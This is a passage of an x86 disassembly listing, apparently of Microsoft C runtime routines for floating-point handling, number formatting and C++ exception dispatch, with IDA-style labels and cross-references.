call sub_41C592
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_41C50A endp
; =============== S U B R O U T I N E =======================================
sub_41C592 proc near ; CODE XREF: sub_41BFA8+7D�p
; sub_41C50A+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_41C5AD
jle short locret_41C5B7
cmp eax, 3
jg short locret_41C5B7
mov ds:dword_4CD9B4, 22h
retn
; ---------------------------------------------------------------------------
loc_41C5AD: ; CODE XREF: sub_41C592+7�j
mov ds:dword_4CD9B4, 21h
locret_41C5B7: ; CODE XREF: sub_41C592+9�j
; sub_41C592+E�j
retn
sub_41C592 endp
; =============== S U B R O U T I N E =======================================
sub_41C5B8 proc near ; CODE XREF: sub_41C50A+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_435EB8
loc_41C5BF: ; CODE XREF: sub_41C5B8+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_41C5D5
add eax, 8
inc ecx
cmp eax, offset dbl_435F90
jl short loc_41C5BF
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C5D5: ; CODE XREF: sub_41C5B8+D�j
mov eax, ds:off_435EBC[ecx*8]
retn
sub_41C5B8 endp
; =============== S U B R O U T I N E =======================================
sub_41C5DD proc near ; CODE XREF: sub_41BFA8+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_41C5E9
push 5
jmp short loc_41C5FF
; ---------------------------------------------------------------------------
loc_41C5E9: ; CODE XREF: sub_41C5DD+6�j
test al, 8
jz short loc_41C5F1
push 1
jmp short loc_41C5FF
; ---------------------------------------------------------------------------
loc_41C5F1: ; CODE XREF: sub_41C5DD+E�j
test al, 4
jz short loc_41C5F9
push 2
jmp short loc_41C5FF
; ---------------------------------------------------------------------------
loc_41C5F9: ; CODE XREF: sub_41C5DD+16�j
test al, 1
jz short loc_41C601
push 3
loc_41C5FF: ; CODE XREF: sub_41C5DD+A�j
; sub_41C5DD+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_41C601: ; CODE XREF: sub_41C5DD+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_41C5DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C60A(double)
sub_41C60A proc near ; CODE XREF: sub_417CA4:loc_417D2A�p
; sub_417DEB:loc_417E71�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_41C60A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C61C(double,int)
sub_41C61C proc near ; CODE XREF: sub_41C69F+82�p
; sub_41C69F+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_41C61C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C645 proc near ; CODE XREF: sub_417CA4+31�p
; sub_417DEB+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_41C65C
cmp [ebp+arg_0], edx
jnz short loc_41C66E
push 1
jmp short loc_41C698
; ---------------------------------------------------------------------------
loc_41C65C: ; CODE XREF: sub_41C645+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_41C66E
cmp [ebp+arg_0], edx
jnz short loc_41C66E
push 2
jmp short loc_41C698
; ---------------------------------------------------------------------------
loc_41C66E: ; CODE XREF: sub_41C645+11�j
; sub_41C645+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41C681
push 3
jmp short loc_41C698
; ---------------------------------------------------------------------------
loc_41C681: ; CODE XREF: sub_41C645+36�j
cmp cx, 7FF0h
jnz short loc_41C69B
test [ebp+arg_4], 7FFFFh
jnz short loc_41C696
cmp [ebp+arg_0], edx
jz short loc_41C69B
loc_41C696: ; CODE XREF: sub_41C645+4A�j
push 4
loc_41C698: ; CODE XREF: sub_41C645+15�j
; sub_41C645+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C69B: ; CODE XREF: sub_41C645+41�j
; sub_41C645+4F�j
xor eax, eax
pop ebp
retn
sub_41C645 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C69F(double,int)
sub_41C69F proc near ; CODE XREF: sub_41C2F3+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp ds:dbl_424818
push esi
fnstsw ax
sahf
jnz short loc_41C6BF
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_41C755
; ---------------------------------------------------------------------------
loc_41C6BF: ; CODE XREF: sub_41C69F+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41C72E
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_41C6D7
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41C72E
loc_41C6D7: ; CODE XREF: sub_41C69F+31�j
fld [ebp+arg_0]
fcomp ds:dbl_424818
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_41C6EF
push 1
pop eax
jmp short loc_41C6F1
; ---------------------------------------------------------------------------
loc_41C6EF: ; CODE XREF: sub_41C69F+49�j
xor eax, eax
loc_41C6F1: ; CODE XREF: sub_41C69F+4E�j
; sub_41C69F+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_41C70A
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_41C704
or dword ptr [ebp+arg_0+4], 1
loc_41C704: ; CODE XREF: sub_41C69F+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_41C6F1
; ---------------------------------------------------------------------------
loc_41C70A: ; CODE XREF: sub_41C69F+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_41C718
or byte ptr [ebp+arg_0+7], 80h
loc_41C718: ; CODE XREF: sub_41C69F+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41C61C
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_41C755
; ---------------------------------------------------------------------------
loc_41C72E: ; CODE XREF: sub_41C69F+28�j
; sub_41C69F+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41C61C
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_41C755: ; CODE XREF: sub_41C69F+1B�j
; sub_41C69F+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_41C69F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C760 proc near ; CODE XREF: sub_41C040+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_41C760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C76E proc near ; CODE XREF: sub_41C040+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_41C76E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C77D proc near ; CODE XREF: sub_417CA4+13�p
; sub_417CA4+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41C77D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7A0 proc near ; CODE XREF: sub_41C2F3+1D�p
; sub_41C2F3+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_41C7B7
fld ds:tbyte_435FB8
fistp [ebp+arg_0]
wait
loc_41C7B7: ; CODE XREF: sub_41C7A0+B�j
test cl, 8
jz short loc_41C7CC
fstsw ax
fld ds:tbyte_435FB8
fstp [ebp+var_8]
wait
fstsw ax
loc_41C7CC: ; CODE XREF: sub_41C7A0+1A�j
test cl, 10h
jz short loc_41C7DB
fld ds:tbyte_435FC4
fstp [ebp+var_8]
wait
loc_41C7DB: ; CODE XREF: sub_41C7A0+2F�j
test cl, 4
jz short loc_41C7E9
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_41C7E9: ; CODE XREF: sub_41C7A0+3E�j
test cl, 20h
jz short locret_41C7F4
fldpi
fstp [ebp+var_8]
wait
locret_41C7F4: ; CODE XREF: sub_41C7A0+4C�j
leave
retn
sub_41C7A0 endp
; =============== S U B R O U T I N E =======================================
sub_41C7F6 proc near ; CODE XREF: sub_417D73+F�p
push 30000h
push 10000h
call sub_4201B7
pop ecx
pop ecx
retn
sub_41C7F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C808 proc near ; CODE XREF: sub_41C846:loc_41C86A�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_424828
fstp [ebp+var_8]
fld ds:dbl_424820
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_4246A8
fnstsw ax
sahf
jbe short loc_41C842
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41C842: ; CODE XREF: sub_41C808+33�j
xor eax, eax
leave
retn
sub_41C808 endp
; =============== S U B R O U T I N E =======================================
sub_41C846 proc near ; CODE XREF: sub_417D73+5�p
push offset aKernel32 ; "KERNEL32"
call ds:off_424100
test eax, eax
jz short loc_41C86A
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:off_4240DC
test eax, eax
jz short loc_41C86A
push 0
call eax ; sub_417D73
retn
; ---------------------------------------------------------------------------
loc_41C86A: ; CODE XREF: sub_41C846+D�j
; sub_41C846+1D�j
jmp sub_41C808
sub_41C846 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C86F proc near ; CODE XREF: sub_419E38+3CB�p
; DATA XREF: sub_417D8B+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_419101
cmp eax, 65h
pop ecx
jz short loc_41C8AF
loc_41C883: ; CODE XREF: sub_41C86F+3E�j
inc esi
cmp ds:dword_433E7C, 1
jle short loc_41C89C
movsx eax, byte ptr [esi]
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_41C8AB
; ---------------------------------------------------------------------------
loc_41C89C: ; CODE XREF: sub_41C86F+1C�j
movsx eax, byte ptr [esi]
mov ecx, ds:off_433C70
mov al, [ecx+eax*2]
and eax, 4
loc_41C8AB: ; CODE XREF: sub_41C86F+2B�j
test eax, eax
jnz short loc_41C883
loc_41C8AF: ; CODE XREF: sub_41C86F+12�j
mov cl, ds:byte_433E80
mov al, [esi]
mov [esi], cl
inc esi
loc_41C8BA: ; CODE XREF: sub_41C86F+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41C8BA
pop esi
retn
sub_41C86F endp
; =============== S U B R O U T I N E =======================================
sub_41C8C9 proc near ; CODE XREF: sub_419E38+3E2�p
; DATA XREF: sub_417D8B+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, ds:byte_433E80
mov cl, [eax]
test cl, cl
jz short loc_41C8E5
loc_41C8D9: ; CODE XREF: sub_41C8C9+1A�j
cmp cl, dl
jz short loc_41C8E5
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_41C8D9
loc_41C8E5: ; CODE XREF: sub_41C8C9+E�j
; sub_41C8C9+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_41C916
loc_41C8EC: ; CODE XREF: sub_41C8C9+34�j
mov cl, [eax]
test cl, cl
jz short loc_41C8FF
cmp cl, 65h
jz short loc_41C8FF
cmp cl, 45h
jz short loc_41C8FF
inc eax
jmp short loc_41C8EC
; ---------------------------------------------------------------------------
loc_41C8FF: ; CODE XREF: sub_41C8C9+27�j
; sub_41C8C9+2C�j ...
mov ecx, eax
loc_41C901: ; CODE XREF: sub_41C8C9+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41C901
cmp [eax], dl
jnz short loc_41C90C
dec eax
loc_41C90C: ; CODE XREF: sub_41C8C9+40�j
; sub_41C8C9+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_41C90C
locret_41C916: ; CODE XREF: sub_41C8C9+21�j
retn
sub_41C8C9 endp
; =============== S U B R O U T I N E =======================================
sub_41C917 proc near ; DATA XREF: sub_417D8B+28�o
; _2:off_435FE0�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_424818
fnstsw ax
sahf
jb short loc_41C92C
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41C92C: ; CODE XREF: sub_41C917+F�j
xor eax, eax
retn
sub_41C917 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C92F proc near ; CODE XREF: sub_41D797+430�p
; DATA XREF: sub_417D8B+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41C958
lea eax, [ebp+var_8]
push eax
call sub_42067A
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41C958: ; CODE XREF: sub_41C92F+C�j
lea eax, [ebp+arg_8]
push eax
call sub_4206A7
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_41C92F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C96D proc near ; CODE XREF: sub_41CBEA+17�p
; sub_41CC34+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:byte_4CDA24, 0
push ebx
push esi
jz short loc_41C9A2
mov ebx, [ebp+arg_8]
mov eax, ds:dword_4CDA20
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_41CC85
pop ecx
pop ecx
jmp short loc_41C9DA
; ---------------------------------------------------------------------------
loc_41C9A2: ; CODE XREF: sub_41C96D+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_42074B
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_4206D4
add esp, 14h
loc_41C9DA: ; CODE XREF: sub_41C96D+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_41C9E6
mov byte ptr [eax], 2Dh
inc eax
loc_41C9E6: ; CODE XREF: sub_41C96D+73�j
test ebx, ebx
jle short loc_41C9FE
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, ds:byte_433E80
mov eax, edi
pop edi
mov [eax], cl
loc_41C9FE: ; CODE XREF: sub_41C96D+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp ds:byte_4CDA24, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_4179C0
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41CA25
mov byte ptr [ecx], 45h
loc_41CA25: ; CODE XREF: sub_41C96D+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41CA6A
mov ebx, [esi+4]
dec ebx
jns short loc_41CA39
neg ebx
mov byte ptr [ecx], 2Dh
loc_41CA39: ; CODE XREF: sub_41C96D+C5�j
inc ecx
cmp ebx, 64h
jl short loc_41CA50
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41CA50: ; CODE XREF: sub_41C96D+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_41CA67
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41CA67: ; CODE XREF: sub_41C96D+E7�j
add [ecx+1], bl
loc_41CA6A: ; CODE XREF: sub_41C96D+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_41C96D endp
; =============== S U B R O U T I N E =======================================
sub_41CA71 proc near ; CODE XREF: sub_41CC11+13�p
; sub_41CC34+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp ds:byte_4CDA24, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_41CAAC
mov eax, ds:dword_4CDA28
mov ebx, [esp+10h+arg_8]
mov esi, ds:dword_4CDA20
cmp eax, ebx
jnz short loc_41CADC
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_41CADC
; ---------------------------------------------------------------------------
loc_41CAAC: ; CODE XREF: sub_41CA71+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_42074B
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_4206D4
add esp, 14h
loc_41CADC: ; CODE XREF: sub_41CA71+22�j
; sub_41CA71+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_41CAEA
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_41CAEA: ; CODE XREF: sub_41CA71+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_41CB01
push 1
push edi
call sub_41CC85
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_41CB03
; ---------------------------------------------------------------------------
loc_41CB01: ; CODE XREF: sub_41CA71+7E�j
add edi, eax
loc_41CB03: ; CODE XREF: sub_41CA71+8E�j
test ebx, ebx
jle short loc_41CB48
push 1
push edi
call sub_41CC85
mov al, ds:byte_433E80
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_41CB48
cmp ds:byte_4CDA24, 0
jz short loc_41CB2D
neg esi
jmp short loc_41CB33
; ---------------------------------------------------------------------------
loc_41CB2D: ; CODE XREF: sub_41CA71+B6�j
neg esi
cmp ebx, esi
jl short loc_41CB35
loc_41CB33: ; CODE XREF: sub_41CA71+BA�j
mov ebx, esi
loc_41CB35: ; CODE XREF: sub_41CA71+C0�j
push ebx
push edi
call sub_41CC85
push ebx
push 30h
push edi
call sub_417330
add esp, 14h
loc_41CB48: ; CODE XREF: sub_41CA71+94�j
; sub_41CA71+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41CA71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB4F proc near ; CODE XREF: sub_41CC34+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_42074B
mov ds:dword_4CDA20, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov ds:dword_4CDA28, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_4206D4
mov eax, ds:dword_4CDA20
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp ds:dword_4CDA28, ecx
setl cl
mov ds:byte_4CDA2C, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov ds:dword_4CDA28, eax
jl short loc_41CBD5
cmp eax, ebx
jge short loc_41CBD5
test cl, cl
jz short loc_41CBC6
loc_41CBBC: ; CODE XREF: sub_41CB4F+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_41CBBC
and [esi-2], al
loc_41CBC6: ; CODE XREF: sub_41CB4F+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_41CC11
add esp, 0Ch
jmp short loc_41CBE5
; ---------------------------------------------------------------------------
loc_41CBD5: ; CODE XREF: sub_41CB4F+63�j
; sub_41CB4F+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_41CBEA
add esp, 10h
loc_41CBE5: ; CODE XREF: sub_41CB4F+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41CB4F endp
; =============== S U B R O U T I N E =======================================
sub_41CBEA proc near ; CODE XREF: sub_41CB4F+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov ds:byte_4CDA24, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41C96D
and ds:byte_4CDA24, 0
add esp, 10h
retn
sub_41CBEA endp
; =============== S U B R O U T I N E =======================================
sub_41CC11 proc near ; CODE XREF: sub_41CB4F+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov ds:byte_4CDA24, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41CA71
and ds:byte_4CDA24, 0
add esp, 0Ch
retn
sub_41CC11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC34 proc near ; CODE XREF: sub_419E38+3AA�p
; DATA XREF: sub_417D8B�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41CC6F
cmp [ebp+arg_8], 45h
jz short loc_41CC6F
cmp [ebp+arg_8], 66h
jnz short loc_41CC5C
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CA71
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41CC5C: ; CODE XREF: sub_41CC34+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CB4F
jmp short loc_41CC80
; ---------------------------------------------------------------------------
loc_41CC6F: ; CODE XREF: sub_41CC34+7�j
; sub_41CC34+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41C96D
loc_41CC80: ; CODE XREF: sub_41CC34+39�j
add esp, 10h
pop ebp
retn
sub_41CC34 endp
; =============== S U B R O U T I N E =======================================
sub_41CC85 proc near ; CODE XREF: sub_41C96D+2C�p
; sub_41CA71+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_41CCA8
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_417AB0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_4182C0
add esp, 10h
pop esi
loc_41CCA8: ; CODE XREF: sub_41CC85+7�j
pop edi
retn
sub_41CC85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CCAA proc near ; CODE XREF: _0:00417F6C�p
; sub_417FD5+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_41CCC0
call sub_41D552
loc_41CCC0: ; CODE XREF: sub_41CCAA+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41CCE8
cmp dword ptr [esi+4], 0
jz short loc_41CD3E
cmp [ebp+arg_14], 0
jnz short loc_41CD3E
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41CFF1
add esp, 10h
jmp short loc_41CD3E
; ---------------------------------------------------------------------------
loc_41CCE8: ; CODE XREF: sub_41CCAA+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41CD3E
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41CD22
cmp [eax+14h], edi
jbe short loc_41CD22
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41CD22
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41CD41
; ---------------------------------------------------------------------------
loc_41CD22: ; CODE XREF: sub_41CCAA+4A�j
; sub_41CCAA+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41CD45
add esp, 20h
loc_41CD3E: ; CODE XREF: sub_41CCAA+23�j
; sub_41CCAA+29�j ...
push 1
pop eax
loc_41CD41: ; CODE XREF: sub_41CCAA+76�j
pop edi
pop esi
pop ebp
retn
sub_41CCAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD45 proc near ; CODE XREF: sub_41CCAA+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_41CD65
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41CD6A
loc_41CD65: ; CODE XREF: sub_41CD45+16�j
call sub_41D552
loc_41CD6A: ; CODE XREF: sub_41CD45+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_41CEC1
cmp dword ptr [esi+10h], 3
jnz short loc_41CDDE
cmp [esi+14h], edi
jnz short loc_41CDDE
cmp dword ptr [esi+1Ch], 0
jnz short loc_41CDDE
mov esi, ds:dword_4CDA30
test esi, esi
jz loc_41CEBC
mov eax, ds:dword_4CDA34
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_4208D2
pop ecx
test eax, eax
pop ecx
jnz short loc_41CDC0
call sub_41D552
loc_41CDC0: ; CODE XREF: sub_41CD45+74�j
cmp [esi], ebx
jnz loc_41CEC1
cmp dword ptr [esi+10h], 3
jnz short loc_41CDDE
cmp [esi+14h], edi
jnz short loc_41CDDE
cmp dword ptr [esi+1Ch], 0
jnz short loc_41CDDE
call sub_41D552
loc_41CDDE: ; CODE XREF: sub_41CD45+41�j
; sub_41CD45+46�j ...
cmp [esi], ebx
jnz loc_41CEC1
cmp dword ptr [esi+10h], 3
jnz loc_41CEC1
cmp [esi+14h], edi
jnz loc_41CEC1
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
